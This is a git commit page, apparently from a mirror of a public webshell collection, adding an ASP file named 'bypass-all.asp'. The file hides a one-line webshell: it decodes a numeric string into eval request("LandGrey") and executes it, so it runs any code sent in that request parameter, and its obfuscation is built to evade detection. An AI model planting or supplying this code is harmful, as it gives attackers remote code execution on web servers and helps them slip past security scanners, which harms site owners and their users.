mirror of
https://github.com/tennc/webshell.git
synced 2025-12-07 05:11:28 +00:00
Create bypass-all.asp
from : https://github.com/LandGrey author : LandGrey
This commit is contained in:
9
asp/bypass-all.asp
Normal file
9
asp/bypass-all.asp
Normal file
@@ -0,0 +1,9 @@
|
|||||||
|
<%<!--"-->
|
||||||
|
eXecUTe(fun("%167%184%163%174%98%180%167%179%183%167%181%182%106%100%142%163%176%166%137%180%167%187%100%107"))
|
||||||
|
Function fun(Str):
|
||||||
|
Str = Split(Str,"%")
|
||||||
|
For x=1 To Ubound(Str)
|
||||||
|
fun=fun&Chr(Str(x)-66)
|
||||||
|
Next
|
||||||
|
End Function
|
||||||
|
%>
|
||||||
Reference in New Issue
Block a user